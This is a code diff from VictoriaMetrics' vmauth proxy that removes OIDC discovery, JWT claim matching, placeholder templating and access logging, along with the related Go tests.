ui.requestErrors = ac.ms.GetOrCreateCounter(`vmauth_user_request_errors_total` + metricLabels)
|
||||
@@ -177,53 +94,36 @@ func parseJWTUsers(ac *AuthConfig) ([]*UserInfo, *oidcDiscovererPool, error) {
|
||||
|
||||
rt, err := newRoundTripper(ui.TLSCAFile, ui.TLSCertFile, ui.TLSKeyFile, ui.TLSServerName, ui.TLSInsecureSkipVerify)
|
||||
if err != nil {
|
||||
return nil, nil, fmt.Errorf("cannot initialize HTTP RoundTripper: %w", err)
|
||||
return nil, fmt.Errorf("cannot initialize HTTP RoundTripper: %w", err)
|
||||
}
|
||||
ui.rt = rt
|
||||
|
||||
jui = append(jui, &ui)
|
||||
}
|
||||
|
||||
// sort by amount of matching claims
|
||||
// it allows to more specific claim win in case of clash
|
||||
sort.SliceStable(jui, func(i, j int) bool {
|
||||
return len(jui[i].JWT.MatchClaims) > len(jui[j].JWT.MatchClaims)
|
||||
})
|
||||
|
||||
return jui, oidcDP, nil
|
||||
}
|
||||
|
||||
var tokenPool sync.Pool
|
||||
|
||||
func getToken() *jwt.Token {
|
||||
tkn := tokenPool.Get()
|
||||
if tkn == nil {
|
||||
return &jwt.Token{}
|
||||
// the limitation will be lifted once claim based matching will be implemented
|
||||
if len(jui) > 1 {
|
||||
return nil, fmt.Errorf("multiple users with JWT tokens are not supported; found %d users", len(jui))
|
||||
}
|
||||
return tkn.(*jwt.Token)
|
||||
|
||||
return jui, nil
|
||||
}
|
||||
|
||||
func putToken(tkn *jwt.Token) {
|
||||
tkn.Reset()
|
||||
tokenPool.Put(tkn)
|
||||
}
|
||||
|
||||
func getJWTUserInfo(ats []string) (*UserInfo, *jwt.Token) {
|
||||
func getUserInfoByJWTToken(ats []string) *UserInfo {
|
||||
js := *jwtAuthCache.Load()
|
||||
if len(js.users) == 0 {
|
||||
return nil, nil
|
||||
return nil
|
||||
}
|
||||
|
||||
tkn := getToken()
|
||||
|
||||
for _, at := range ats {
|
||||
if strings.Count(at, ".") != 2 {
|
||||
continue
|
||||
}
|
||||
|
||||
at, _ = strings.CutPrefix(at, `http_auth:`)
|
||||
tkn.Reset()
|
||||
if err := tkn.Parse(at, true); err != nil {
|
||||
|
||||
tkn, err := jwt.NewToken(at, true)
|
||||
if err != nil {
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("cannot parse jwt token: %s", err)
|
||||
}
|
||||
@@ -231,252 +131,26 @@ func getJWTUserInfo(ats []string) (*UserInfo, *jwt.Token) {
|
||||
}
|
||||
if tkn.IsExpired(time.Now()) {
|
||||
if *logInvalidAuthTokens {
|
||||
// TODO: add more context:
|
||||
// token claims with issuer
|
||||
logger.Infof("jwt token is expired")
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
if ui := getUserInfoByJWTToken(tkn, js.users); ui != nil {
|
||||
return ui, tkn
|
||||
}
|
||||
}
|
||||
for _, ui := range js.users {
|
||||
if ui.JWT.SkipVerify {
|
||||
return ui
|
||||
}
|
||||
|
||||
putToken(tkn)
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func getUserInfoByJWTToken(tkn *jwt.Token, users []*UserInfo) *UserInfo {
|
||||
for _, ui := range users {
|
||||
if !tkn.MatchClaims(ui.JWT.parsedMatchClaims) {
|
||||
continue
|
||||
}
|
||||
|
||||
if ui.JWT.SkipVerify {
|
||||
return ui
|
||||
}
|
||||
|
||||
if ui.JWT.OIDC != nil {
|
||||
// OIDC requires iss claim.
|
||||
// It must match the discovery issuer URL set in OIDC config.
|
||||
// https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata
|
||||
if tkn.Issuer() == "" {
|
||||
if err := ui.JWT.verifierPool.Verify(tkn); err != nil {
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("jwt token must have issuer filed")
|
||||
logger.Infof("cannot verify jwt token: %s", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
if tkn.Issuer() != ui.JWT.OIDC.Issuer {
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("jwt token issuer: %q does not match oidc issuer: %q", tkn.Issuer(), ui.JWT.OIDC.Issuer)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
vp := ui.JWT.verifierPool.Load()
|
||||
if vp == nil {
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("jwt verifier not initialed")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
if err := vp.Verify(tkn); err != nil {
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("cannot verify jwt token: %s", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
return ui
|
||||
}
|
||||
|
||||
if *logInvalidAuthTokens {
|
||||
logger.Infof("no user match jwt token")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func replaceJWTPlaceholders(bu *backendURL, hc HeadersConf, vma *jwt.VMAccessClaim) (*url.URL, HeadersConf) {
|
||||
if !bu.hasPlaceHolders && !hc.hasAnyPlaceHolders {
|
||||
return bu.url, hc
|
||||
}
|
||||
targetURL := bu.url
|
||||
data := jwtClaimsData(vma)
|
||||
if bu.hasPlaceHolders {
|
||||
// template url params and request path
|
||||
// make a copy of url
|
||||
uCopy := *bu.url
|
||||
for _, uph := range urlPathPlaceHolders {
|
||||
replacement := data[uph]
|
||||
uCopy.Path = strings.ReplaceAll(uCopy.Path, uph, replacement[0])
|
||||
}
|
||||
query := uCopy.Query()
|
||||
var foundAnyQueryPlaceholder bool
|
||||
var templatedValues []string
|
||||
for param, values := range query {
|
||||
templatedValues = templatedValues[:0]
|
||||
// filter in-place values with placeholders
|
||||
// and accumulate replacements
|
||||
// it will change the order of param values
|
||||
// but it's not guaranteed
|
||||
// and will be changed in any way with multiple arg templates
|
||||
var cnt int
|
||||
for _, value := range values {
|
||||
if dv, ok := data[value]; ok {
|
||||
foundAnyQueryPlaceholder = true
|
||||
templatedValues = append(templatedValues, dv...)
|
||||
continue
|
||||
}
|
||||
values[cnt] = value
|
||||
cnt++
|
||||
}
|
||||
values = values[:cnt]
|
||||
values = append(values, templatedValues...)
|
||||
query[param] = values
|
||||
}
|
||||
if foundAnyQueryPlaceholder {
|
||||
uCopy.RawQuery = query.Encode()
|
||||
}
|
||||
targetURL = &uCopy
|
||||
}
|
||||
if hc.hasAnyPlaceHolders {
|
||||
// make a copy of headers and update only values with placeholder
|
||||
rhs := make([]*Header, 0, len(hc.RequestHeaders))
|
||||
for _, rh := range hc.RequestHeaders {
|
||||
if dv, ok := data[rh.Value]; ok {
|
||||
rh := &Header{
|
||||
Name: rh.Name,
|
||||
Value: strings.Join(dv, ","),
|
||||
}
|
||||
rhs = append(rhs, rh)
|
||||
continue
|
||||
}
|
||||
rhs = append(rhs, rh)
|
||||
}
|
||||
hc.RequestHeaders = rhs
|
||||
}
|
||||
|
||||
return targetURL, hc
|
||||
}
|
||||
|
||||
func jwtClaimsData(vma *jwt.VMAccessClaim) map[string][]string {
|
||||
data := map[string][]string{
|
||||
// TODO: optimize at parsing stage
|
||||
metricsTenantPlaceholder: {fmt.Sprintf("%d:%d", vma.MetricsAccountID, vma.MetricsProjectID)},
|
||||
metricsExtraLabelsPlaceholder: vma.MetricsExtraLabels,
|
||||
metricsExtraFiltersPlaceholder: vma.MetricsExtraFilters,
|
||||
|
||||
// TODO: optimize at parsing stage
|
||||
logsAccountIDPlaceholder: {fmt.Sprintf("%d", vma.LogsAccountID)},
|
||||
logsProjectIDPlaceholder: {fmt.Sprintf("%d", vma.LogsProjectID)},
|
||||
logsExtraFiltersPlaceholder: vma.LogsExtraFilters,
|
||||
logsExtraStreamFiltersPlaceholder: vma.LogsExtraStreamFilters,
|
||||
}
|
||||
return data
|
||||
}
|
||||
|
||||
func parseJWTPlaceholdersForUserInfo(ui *UserInfo, isAllowed bool) error {
|
||||
if ui.URLPrefix != nil {
|
||||
if err := validateJWTPlaceholdersForURL(ui.URLPrefix, isAllowed); err != nil {
|
||||
return err
|
||||
return ui
|
||||
}
|
||||
}
|
||||
if err := parsePlaceholdersForHC(&ui.HeadersConf, isAllowed); err != nil {
|
||||
return err
|
||||
}
|
||||
if ui.DefaultURL != nil {
|
||||
if err := validateJWTPlaceholdersForURL(ui.DefaultURL, isAllowed); err != nil {
|
||||
return fmt.Errorf("invalid `default_url` placeholders: %w", err)
|
||||
}
|
||||
}
|
||||
for i := range ui.URLMaps {
|
||||
e := &ui.URLMaps[i]
|
||||
if e.URLPrefix != nil {
|
||||
if err := validateJWTPlaceholdersForURL(e.URLPrefix, isAllowed); err != nil {
|
||||
return fmt.Errorf("invalid `url_map` `url_prefix` placeholders: %w", err)
|
||||
}
|
||||
}
|
||||
if err := parsePlaceholdersForHC(&e.HeadersConf, isAllowed); err != nil {
|
||||
return fmt.Errorf("invalid `url_map` headers placeholders: %w", err)
|
||||
}
|
||||
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func validateJWTPlaceholdersForURL(up *URLPrefix, isAllowed bool) error {
|
||||
for _, bu := range up.busOriginal {
|
||||
ok := strings.Contains(bu.Path, placeholderPrefix)
|
||||
if ok && !isAllowed {
|
||||
return fmt.Errorf("placeholder: %q is only allowed at JWT token context", bu.Path)
|
||||
}
|
||||
if ok {
|
||||
p := bu.Path
|
||||
for _, ph := range allPlaceholders {
|
||||
p = strings.ReplaceAll(p, ph, ``)
|
||||
}
|
||||
if strings.Contains(p, placeholderPrefix) {
|
||||
return fmt.Errorf("invalid placeholder found in URL request path: %q, supported values are: %s", bu.Path, strings.Join(allPlaceholders, ", "))
|
||||
|
||||
}
|
||||
}
|
||||
for param, values := range bu.Query() {
|
||||
for _, value := range values {
|
||||
ok := strings.Contains(value, placeholderPrefix)
|
||||
if ok && !isAllowed {
|
||||
return fmt.Errorf("query param: %q with placeholder: %q is only allowed at JWT token context", param, value)
|
||||
}
|
||||
if ok {
|
||||
// possible placeholder
|
||||
if !slices.Contains(allPlaceholders, value) {
|
||||
return fmt.Errorf("query param: %q has unsupported placeholder string: %q, supported values are: %s", param, value, strings.Join(allPlaceholders, ", "))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func parsePlaceholdersForHC(hc *HeadersConf, isAllowed bool) error {
|
||||
for _, rhs := range hc.RequestHeaders {
|
||||
ok := strings.Contains(rhs.Value, placeholderPrefix)
|
||||
if ok && !isAllowed {
|
||||
return fmt.Errorf("request header: %q placeholder: %q is only supported at JWT context", rhs.Name, rhs.Value)
|
||||
}
|
||||
if ok {
|
||||
if !slices.Contains(allPlaceholders, rhs.Value) {
|
||||
return fmt.Errorf("request header: %q has unsupported placeholder: %q, supported values are: %s", rhs.Name, rhs.Value, strings.Join(allPlaceholders, ", "))
|
||||
}
|
||||
hc.hasAnyPlaceHolders = true
|
||||
}
|
||||
}
|
||||
for _, rhs := range hc.ResponseHeaders {
|
||||
if strings.Contains(rhs.Value, placeholderPrefix) {
|
||||
return fmt.Errorf("response header placeholders are not supported; found placeholder prefix at header: %q with value: %q", rhs.Name, rhs.Value)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func hasAnyPlaceholders(u *url.URL) bool {
|
||||
if strings.Contains(u.Path, placeholderPrefix) {
|
||||
return true
|
||||
}
|
||||
if len(u.Query()) == 0 {
|
||||
return false
|
||||
}
|
||||
for _, values := range u.Query() {
|
||||
for _, value := range values {
|
||||
if strings.HasPrefix(value, placeholderPrefix) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
@@ -1,10 +1,7 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"testing"
|
||||
@@ -35,20 +32,18 @@ XOtclIk1uhc03oL9nOQ=
|
||||
ac, err := parseAuthConfig([]byte(s))
|
||||
if err != nil {
|
||||
if expErr != err.Error() {
|
||||
t.Fatalf("unexpected error; got\n%q\nwant\n%q", err.Error(), expErr)
|
||||
t.Fatalf("unexpected error; got %q; want %q", err.Error(), expErr)
|
||||
}
|
||||
return
|
||||
}
|
||||
users, oidcDP, err := parseJWTUsers(ac)
|
||||
if err == nil {
|
||||
t.Fatalf("expecting non-nil error; got %v", users)
|
||||
}
|
||||
if expErr != err.Error() {
|
||||
t.Fatalf("unexpected error; got\n%q\nwant \n%q", err.Error(), expErr)
|
||||
}
|
||||
if oidcDP != nil {
|
||||
t.Fatalf("expecting nil oidcDP; got %v", oidcDP)
|
||||
users, err := parseJWTUsers(ac)
|
||||
if err != nil {
|
||||
if expErr != err.Error() {
|
||||
t.Fatalf("unexpected error; got %q; want %q", err.Error(), expErr)
|
||||
}
|
||||
return
|
||||
}
|
||||
t.Fatalf("expecting non-nil error; got %v", users)
|
||||
}
|
||||
|
||||
// unauthorized_user cannot be used with jwt
|
||||
@@ -85,28 +80,28 @@ users:
|
||||
users:
|
||||
- jwt: {}
|
||||
url_prefix: http://foo.bar
|
||||
`, `jwt must contain at least a single public key, public_key_files, oidc or have skip_verify=true`)
|
||||
`, `jwt must contain at least a single public key, public_key_files or have skip_verify=true`)
|
||||
|
||||
// jwt public_keys or skip_verify must be set, part 2
|
||||
f(`
|
||||
users:
|
||||
- jwt: {public_keys: null}
|
||||
url_prefix: http://foo.bar
|
||||
`, `jwt must contain at least a single public key, public_key_files, oidc or have skip_verify=true`)
|
||||
`, `jwt must contain at least a single public key, public_key_files or have skip_verify=true`)
|
||||
|
||||
// jwt public_keys or skip_verify must be set, part 3
|
||||
f(`
|
||||
users:
|
||||
- jwt: {public_keys: []}
|
||||
url_prefix: http://foo.bar
|
||||
`, `jwt must contain at least a single public key, public_key_files, oidc or have skip_verify=true`)
|
||||
`, `jwt must contain at least a single public key, public_key_files or have skip_verify=true`)
|
||||
|
||||
// jwt public_keys, public_key_files or skip_verify must be set
|
||||
f(`
|
||||
users:
|
||||
- jwt: {public_key_files: []}
|
||||
url_prefix: http://foo.bar
|
||||
`, `jwt must contain at least a single public key, public_key_files, oidc or have skip_verify=true`)
|
||||
`, `jwt must contain at least a single public key, public_key_files or have skip_verify=true`)
|
||||
|
||||
// invalid public key, part 1
|
||||
f(`
|
||||
@@ -145,7 +140,7 @@ users:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: http://foo.bar
|
||||
`, validRSAPublicKey, validECDSAPublicKey), `duplicate match claims="" found for name="" at idx=1; the previous one is set for name=""`)
|
||||
`, validRSAPublicKey, validECDSAPublicKey), `multiple users with JWT tokens are not supported; found 2 users`)
|
||||
|
||||
// public key file doesn't exist
|
||||
f(`
|
||||
@@ -169,122 +164,6 @@ users:
|
||||
- `+publicKeyFile+`
|
||||
url_prefix: http://foo.bar
|
||||
`, "cannot parse public key from file \""+publicKeyFile+"\": failed to parse key \"invalidPEM\": failed to decode PEM block containing public key")
|
||||
|
||||
// unsupported placeholder in a header
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
url_prefix: http://foo.bar/{{.UnsupportedPlaceholder}}/foo`,
|
||||
"invalid placeholder found in URL request path: \"/{{.UnsupportedPlaceholder}}/foo\", supported values are: {{.MetricsTenant}}, {{.MetricsExtraLabels}}, {{.MetricsExtraFilters}}, {{.LogsAccountID}}, {{.LogsProjectID}}, {{.LogsExtraFilters}}, {{.LogsExtraStreamFilters}}",
|
||||
)
|
||||
// unsupported placeholder in a header
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
headers:
|
||||
- "AccountID: {{.UnsupportedPlaceholder}}"
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"request header: \"AccountID\" has unsupported placeholder: \"{{.UnsupportedPlaceholder}}\", supported values are: {{.MetricsTenant}}, {{.MetricsExtraLabels}}, {{.MetricsExtraFilters}}, {{.LogsAccountID}}, {{.LogsProjectID}}, {{.LogsExtraFilters}}, {{.LogsExtraStreamFilters}}",
|
||||
)
|
||||
|
||||
// spaces in templating not allowed
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
headers:
|
||||
- "AccountID: {{ .LogsAccountID }}"
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"request header: \"AccountID\" has unsupported placeholder: \"{{ .LogsAccountID }}\", supported values are: {{.MetricsTenant}}, {{.MetricsExtraLabels}}, {{.MetricsExtraFilters}}, {{.LogsAccountID}}, {{.LogsProjectID}}, {{.LogsExtraFilters}}, {{.LogsExtraStreamFilters}}",
|
||||
)
|
||||
|
||||
// oidc is not an object
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
oidc: "not an object"
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"cannot unmarshal AuthConfig data: yaml: unmarshal errors:\n line 4: cannot unmarshal !!str `not an ...` into main.oidcConfig",
|
||||
)
|
||||
|
||||
// oidc issuer empty
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
oidc: {}
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"oidc issuer cannot be empty",
|
||||
)
|
||||
|
||||
// oidc issuer invalid urls
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
oidc:
|
||||
issuer: "::invalid-url"
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"oidc issuer \"::invalid-url\" must be a valid URL",
|
||||
)
|
||||
|
||||
// oidc issuer invalid urls
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
oidc:
|
||||
issuer: "invalid-url"
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"oidc issuer \"invalid-url\" must have http or https scheme",
|
||||
)
|
||||
|
||||
// oidc and public_keys are not allowed
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
oidc:
|
||||
issuer: https://example.com
|
||||
url_prefix: http://foo.bar
|
||||
`, validRSAPublicKey),
|
||||
"jwt with oidc cannot contain public keys or have skip_verify=true",
|
||||
)
|
||||
|
||||
// oidc and skip_verify are not allowed
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
oidc:
|
||||
issuer: https://example.com
|
||||
url_prefix: http://foo.bar
|
||||
`,
|
||||
"jwt with oidc cannot contain public keys or have skip_verify=true",
|
||||
)
|
||||
// duplicate claims
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: ops
|
||||
name: user-1
|
||||
url_prefix: http://foo.bar
|
||||
- jwt:
|
||||
skip_verify: true
|
||||
match_claims:
|
||||
team: ops
|
||||
name: user-2
|
||||
url_prefix: http://foo.bar`,
|
||||
"duplicate match claims=\"team=ops\" found for name=\"user-2\" at idx=1; the previous one is set for name=\"user-1\"",
|
||||
)
|
||||
}
|
||||
|
||||
func TestJWTParseAuthConfigSuccess(t *testing.T) {
|
||||
@@ -314,12 +193,10 @@ XOtclIk1uhc03oL9nOQ=
|
||||
t.Fatalf("unexpected error: %s", err)
|
||||
}
|
||||
|
||||
jui, oidcDP, err := parseJWTUsers(ac)
|
||||
jui, err := parseJWTUsers(ac)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %s", err)
|
||||
}
|
||||
oidcDP.startDiscovery()
|
||||
defer oidcDP.stopDiscovery()
|
||||
|
||||
for _, ui := range jui {
|
||||
if ui.JWT == nil {
|
||||
@@ -327,13 +204,13 @@ XOtclIk1uhc03oL9nOQ=
|
||||
}
|
||||
|
||||
if ui.JWT.SkipVerify {
|
||||
if ui.JWT.verifierPool.Load() != nil {
|
||||
if ui.JWT.verifierPool != nil {
|
||||
t.Fatalf("unexpected non-nil verifier pool for skip_verify=true")
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
if ui.JWT.verifierPool.Load() == nil {
|
||||
if ui.JWT.verifierPool == nil {
|
||||
t.Fatalf("unexpected nil verifier pool for non-empty public keys")
|
||||
}
|
||||
}
|
||||
@@ -424,80 +301,4 @@ users:
|
||||
- %q
|
||||
url_prefix: http://foo.bar
|
||||
`, validECDSAPublicKey, rsaKeyFile))
|
||||
|
||||
// oidc stub server
|
||||
var ipSrv *httptest.Server
|
||||
ipSrv = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.URL.Path == "/.well-known/openid-configuration" {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
_ = json.NewEncoder(w).Encode(map[string]string{
|
||||
"issuer": ipSrv.URL,
|
||||
"jwks_uri": fmt.Sprintf("%s/jwks", ipSrv.URL),
|
||||
})
|
||||
return
|
||||
}
|
||||
if r.URL.Path == "/jwks" {
|
||||
// resp generated by https://jwkset.com/generate
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
w.Write([]byte(`
|
||||
{
|
||||
"keys": [
|
||||
{
|
||||
"kty": "RSA",
|
||||
"kid": "f13eee91-f566-4829-80fa-fca847c21f0e",
|
||||
"d": "Ua1llEFz3LZ05CrK5a2JxKMUEWJGXhBPPF20hHQjzxd1w0IEJK_mhPZQG8dNtBROBNIi1FC9l6QRw-RTnVIVat5Xy4yDFNKXXL3ZLXejOHY8SXrNEIDqQ-cSwIpK9cK7Umib0PcPeEeeAED5mqDH75D8_YssWFF18kLbNB5Z9pZmn6Fshiht7l2Sh4GN-KcReOW6eiQQwckDte3OGmZCRbtEriLWJt5TUGUvfZVIlcclqNMycNB6jGa9E1pO5Up7Ki3ZbI_-6XmRgZPtqnR9oLJ1zn3fj3hYpCXo-zcqLuOu3qxcslsq5igsfBzgGtfIJHY9LfWmHUsaDEa5cAX1gQ",
|
||||
"n": "xbLXXBTNREk70UCMiqZ53_mTzYh89W-UaPU61GZ-RZ5lYcLgyWOb5mdyRbvJpcgfZpsOeGAUWbk3GkQ4vqn8kUMnnWhUum2Qk9kGubOJGLW6yaURd00j3E-ilQ5xO2R_Hzz8bAojxV8GKdGTQ-iTf8z8nsSHH8kR2SERbNJCFFtwtFU7vyFWyoH4Lmvu2UpICTHFCR9RqwQVjyoKB1JjJ6Dh1L4zPTlsvQEnqoeFQHPYr0QcQSMYXdfPvlt_FiLOAOE89fX_9T2r9WbFAoda3uTRE5_aal0jxUU2cFyeVSIgauNtF07fp422XFb4XPkWQWrdNx0KX53laSIYQ9HOpw",
|
||||
"e": "AQAB",
|
||||
"p": "2JT57AD-Q2lamgjgyn0wL7DgYZ3OoCTTrDm5_NHg6h13uDvyIlXSukuUeWm4tzPSDedpstbS7dgXkLw5eQXBHwPYtByTcEZS8Z37CBnhMOOhfo_U1aNIPPanJACvWBgz47-TxHsxW1YhztZqghRoicBZPSSBAj49MgANJ4jF0zc",
|
||||
"q": "6a4MkeSXJI-ZzQ-bgP8hwJqpLFr0AiNGQcjZMH4Nn4CPGdnGiqqe6flhfLimgbNhbb67B0-8fLIji8zGhGKDL_JSIpAAdmfs2vzeEsY2hScrqVbd1VbfRcRh0J6lsn7obxkbvQthp9sX2DQbeDcEeaFEvd9gDKQSATYEqWo7eBE",
|
||||
"dp": "haL2yu6Z9RJuuxi7S3YPY33qFZF_y0St71j3L854zzw7gMxMTW9TRWwZQwk-1pv9AmNFzvnK0MNDVyUs-UXZsb932TrApshdqYRnPsppLvdl0GgDVYcYrbUr0IUzrFHSwraVAOlavRbaaXvX4EejcUvkRFvf1nh83fs2Iqy8E-U",
|
||||
"dq": "Cnf5qC-Ndd3ZDg688LJ9WJuVKJ-Kfu4Fn7zXvgxnn9Wqk4XmFyA9rk21yFidXQIkQz5gMpun3g48-W5bFmMzbVp1w4af_q35NnZNnJm0p5Jxqkxx87TIm9-IYkg5NB3rW87MJ1PzNAnkr5LmCCSu1qQa6Eaxjt9qzxMUcmKH94E",
|
||||
"qi": "saAeU11iaKHmye3cwCAYkegcyWbXV3xIXEVJtS9Af_yM19UhspwY2VhuwRaajcwYZwtvR9_ITmX9M-ea7uLdd7aDYO1fujC8NGbopeC4Hkr7yb5vTly3pfKf4h-3LwGGUucJUetdz1lmMIYiyuG4_gSf1yIEtPDLKzXiedgEMdI"
|
||||
}
|
||||
]
|
||||
}
|
||||
`))
|
||||
return
|
||||
}
|
||||
|
||||
http.NotFound(w, r)
|
||||
}))
|
||||
defer ipSrv.Close()
|
||||
|
||||
f(`
|
||||
users:
|
||||
- jwt:
|
||||
oidc:
|
||||
issuer: ` + ipSrv.URL + `
|
||||
url_prefix: http://foo.bar
|
||||
`)
|
||||
// multiple match claims
|
||||
f(fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
match_claims:
|
||||
role: ro
|
||||
team: dev
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: http://foo.bar
|
||||
- jwt:
|
||||
match_claims:
|
||||
role: admin
|
||||
team: dev
|
||||
public_key_files:
|
||||
- %q
|
||||
- %q
|
||||
url_prefix: http://foo.bar
|
||||
- jwt:
|
||||
match_claims:
|
||||
role: viewer
|
||||
team: dev
|
||||
department: ceo
|
||||
skip_verify: true
|
||||
url_prefix: http://foo.bar
|
||||
|
||||
|
||||
`, validRSAPublicKey, rsaKeyFile, ecdsaKeyFile))
|
||||
|
||||
}
|
||||
|
||||
@@ -16,7 +16,6 @@ import (
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/jwt"
|
||||
"github.com/VictoriaMetrics/metrics"
|
||||
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/buildinfo"
|
||||
@@ -174,7 +173,7 @@ func requestHandler(w http.ResponseWriter, r *http.Request) bool {
|
||||
// Process requests for unauthorized users
|
||||
ui := authConfig.Load().UnauthorizedUser
|
||||
if ui != nil {
|
||||
processUserRequest(w, r, ui, nil)
|
||||
processUserRequest(w, r, ui)
|
||||
return true
|
||||
}
|
||||
|
||||
@@ -183,21 +182,17 @@ func requestHandler(w http.ResponseWriter, r *http.Request) bool {
|
||||
}
|
||||
|
||||
if ui := getUserInfoByAuthTokens(ats); ui != nil {
|
||||
processUserRequest(w, r, ui, nil)
|
||||
processUserRequest(w, r, ui)
|
||||
return true
|
||||
}
|
||||
if ui, tkn := getJWTUserInfo(ats); ui != nil {
|
||||
if tkn == nil {
|
||||
logger.Panicf("BUG: unexpected nil jwt token for user %q", ui.name())
|
||||
}
|
||||
defer putToken(tkn)
|
||||
processUserRequest(w, r, ui, tkn)
|
||||
if ui := getUserInfoByJWTToken(ats); ui != nil {
|
||||
processUserRequest(w, r, ui)
|
||||
return true
|
||||
}
|
||||
|
||||
uu := authConfig.Load().UnauthorizedUser
|
||||
if uu != nil {
|
||||
processUserRequest(w, r, uu, nil)
|
||||
processUserRequest(w, r, uu)
|
||||
return true
|
||||
}
|
||||
|
||||
@@ -226,37 +221,7 @@ func getUserInfoByAuthTokens(ats []string) *UserInfo {
|
||||
return nil
|
||||
}
|
||||
|
||||
// responseWriterWithStatus is a wrapper around http.ResponseWriter that captures the status code written to the response.
|
||||
type responseWriterWithStatus struct {
|
||||
http.ResponseWriter
|
||||
status int
|
||||
}
|
||||
|
||||
// WriteHeader records the status so it can be easily retrieved later
|
||||
func (rws *responseWriterWithStatus) WriteHeader(status int) {
|
||||
rws.status = status
|
||||
rws.ResponseWriter.WriteHeader(status)
|
||||
}
|
||||
|
||||
// Flush implements net/http.Flusher interface
|
||||
//
|
||||
// This is needed for the copyStreamToClient()
|
||||
func (rws *responseWriterWithStatus) Flush() {
|
||||
flusher, ok := rws.ResponseWriter.(http.Flusher)
|
||||
if !ok {
|
||||
logger.Panicf("BUG: it is expected http.ResponseWriter (%T) supports http.Flusher interface", rws.ResponseWriter)
|
||||
}
|
||||
flusher.Flush()
|
||||
}
|
||||
|
||||
// Unwrap returns the original ResponseWriter wrapped by rws.
|
||||
//
|
||||
// This is needed for the net/http.ResponseController - see https://pkg.go.dev/net/http#NewResponseController
|
||||
func (rws *responseWriterWithStatus) Unwrap() http.ResponseWriter {
|
||||
return rws.ResponseWriter
|
||||
}
|
||||
|
||||
func processUserRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tkn *jwt.Token) {
|
||||
func processUserRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo) {
|
||||
startTime := time.Now()
|
||||
defer ui.requestsDuration.UpdateDuration(startTime)
|
||||
|
||||
@@ -265,20 +230,6 @@ func processUserRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tk
|
||||
ctx, cancel := context.WithTimeout(r.Context(), *maxQueueDuration)
|
||||
defer cancel()
|
||||
|
||||
userName := ui.name()
|
||||
if userName == "" {
|
||||
userName = "unauthorized"
|
||||
}
|
||||
|
||||
if ui.AccessLog != nil {
|
||||
w = &responseWriterWithStatus{ResponseWriter: w}
|
||||
defer func() {
|
||||
rws := w.(*responseWriterWithStatus)
|
||||
duration := time.Since(startTime)
|
||||
ui.logRequest(r, userName, rws.status, duration)
|
||||
}()
|
||||
}
|
||||
|
||||
// Acquire global concurrency limit.
|
||||
if err := beginConcurrencyLimit(ctx); err != nil {
|
||||
handleConcurrencyLimitError(w, r, err)
|
||||
@@ -297,6 +248,10 @@ func processUserRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tk
|
||||
}
|
||||
|
||||
// Read the initial chunk for the request body.
|
||||
userName := ui.name()
|
||||
if userName == "" {
|
||||
userName = "unauthorized"
|
||||
}
|
||||
bb, err := bufferRequestBody(ctx, r.Body, userName)
|
||||
if err != nil {
|
||||
httpserver.Errorf(w, r, "%s", err)
|
||||
@@ -317,7 +272,7 @@ func processUserRequest(w http.ResponseWriter, r *http.Request, ui *UserInfo, tk
|
||||
